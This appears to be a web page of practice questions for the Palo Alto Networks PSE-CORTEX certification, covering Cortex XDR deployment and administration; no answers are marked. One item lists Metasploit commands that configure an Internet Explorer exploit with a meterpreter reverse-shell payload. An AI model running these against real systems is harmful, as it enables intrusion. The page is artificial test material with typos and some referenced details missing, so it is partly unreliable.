PSE-CORTEX Online Practice Questions and Answers

During the TMS instance activation, a tenant (Customer) provides the following information for the fields in the Activation - Step 2 of 2 window.

During the service instance provisioning which three DNS host names are created? (Choose three.)

A. cc-xnet50.traps.paloaltonetworks.com

B. hc-xnet50.traps.paloaltonetworks.com

C. cc-xnet.traps.paloaltonetworks.com

D. cc.xnet50traps.paloaltonetworks.com

E. xnettraps.paloaltonetworks.com

F. ch-xnet.traps.paloaltonetworks.com

An administrator of a Cortex XDR protected production environment would like to test its ability to protect users from a known flash player exploit.

What is the safest way to do it?

A. The administrator should attach a copy of the weapomzed flash file to an email, send the email to a selected group of employees, and monitor the Events tab on the Cortex XDR console

B. The administrator should use the Cortex XDR tray icon to confirm his corporate laptop is fully protected then open the weaponized flash file on his machine, and monitor the Events tab on the Cortex XDR console.

C. The administrator should create a non-production Cortex XDR test environment that accurately represents the production environment, introduce the weaponized flash file, and monitor the Events tab on the Cortex XDR console.

D. The administrator should place a copy of the weaponized flash file on several USB drives, scatter them around the office and monitor the Events tab on the Cortex XDR console

An antivirus refresh project was initiated by the IT operations executive. Who is the best source for discussion about the project's operational considerations'?

A. endpoint manager

B. SOC manager

C. SOC analyst

D. desktop engineer

When analyzing logs for indicators, which are used for only BIOC identification'?

A. observed activity

B. artifacts

C. techniques

D. error messages

What is the result of creating an exception from an exploit security event?

A. White lists the process from Wild Fire analysis

B. exempts the user from generating events for 24 hours

C. exempts administrators from generating alerts for 24 hours

D. disables the triggered EPM for the host and process involve

Which two log types should be configuredfor firewall forwarding to the Cortex Data Lake for use by Cortex XDR?(Choose two)

A. Security Event

B. HIP

C. Correlation

D. Analytics

Which step is required to prepare the VDI Golden Image?

A. Review any PE files that WildFire determined to be malicious

B. Ensure the latest content updates are installed

C. Run the VDI conversion tool

D. Set the memory dumps to manual setting

A test for a Microsoft exploit has been planned. After some research Internet Explorer 11 CVE-2016-0189 has been selected and a module in Metasploit has been identified (exploit/windows/browser/ms16_051_vbscript)

The description and current configuration of the exploit are as follows;

What is the remaining configuration?

A. set PAYLOAD windows/x64/meterpreter/reverse_tcp set SSLCert survey set LHOST 10.0.0.10

set LPORT 8080

B. set PAYLOAD windows/x64/powershell_bind_tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

C. set PAYLOAD windows/x64/meterpreter/reverse_Tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

D. set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.10 set LPORT 443 set URIPATH survey

Cortex XDR can schedule recurring scans of endpoints for malware. Identify two methods for initiating an on-demand malware scan (Choose two )

A. Response > Action Center

B. the local console

C. Telnet

D. Endpoint > Endpoint Management

Which CLI query would bring back Notable Events from Splunk?

A. ! splunk-search query=" `notable` | head 3"

B. ! splunk-search query=" 'notable' | head 3"

C. ! splunk-search query="*"

D. ! splunk-search query="* | head 3"